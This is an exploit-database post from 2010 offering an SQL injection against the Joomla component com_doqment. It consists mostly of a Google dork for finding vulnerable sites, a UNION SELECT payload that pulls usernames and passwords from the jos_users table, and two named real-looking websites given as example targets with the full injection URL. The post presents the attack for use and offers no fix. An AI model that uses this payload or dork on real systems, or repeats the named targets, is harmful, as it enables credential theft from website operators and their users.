[D] Script JOMMLA ----> Sql injection [Z]

2010-11-24 15:04:18
Posted by: kedans

-------------------------------------------------------------------------
# Script JOMMLA ----> Sql injection
# Author : KedAns-Dz
# Date : n/a
# Dork : PHP SQL injection
# Exampl : google.com --- > sharech : " inurl:index.php?option=com_doqment&cid= + sql injection
# // : http://www.phdbrasil.com.br/index.php?option=com_doqment&cid=-11/**/union/**/select/**/1,2,concat(username,0x3a,password),4,5,6,7,8/**/from/**/jos_users--
--------------------------------------------------------------------------

Exploiat :


http://[Victim-web]/index.php?option=com_doqment&cid= ***SQl DZ***

*** SQL DZ *** -----> ::


-11/**/union/**/select/**/1,2,concat(username,0x3a,password),4,5,6,7,8/**/from/**/jos_users--


Exampl 2 : http://theancientsprings.de/index.php?option=com_doqment&cid=-11/**/union/**/select/**/1,2,concat(username,0x3a,password),4,5,6,7,8/**/from/**/jos_users--

--------------------------------------------------------------------------------------
** E-mail : [email protected] **
# Greetz : Islampard * BadR0 * NoRo founy * dr.Ride * Red1One * XoreR King * ...

HaCkerS-Street-Team *DZ* ..

Fixes

No fixes

In order to submit a new fix you need to be registered.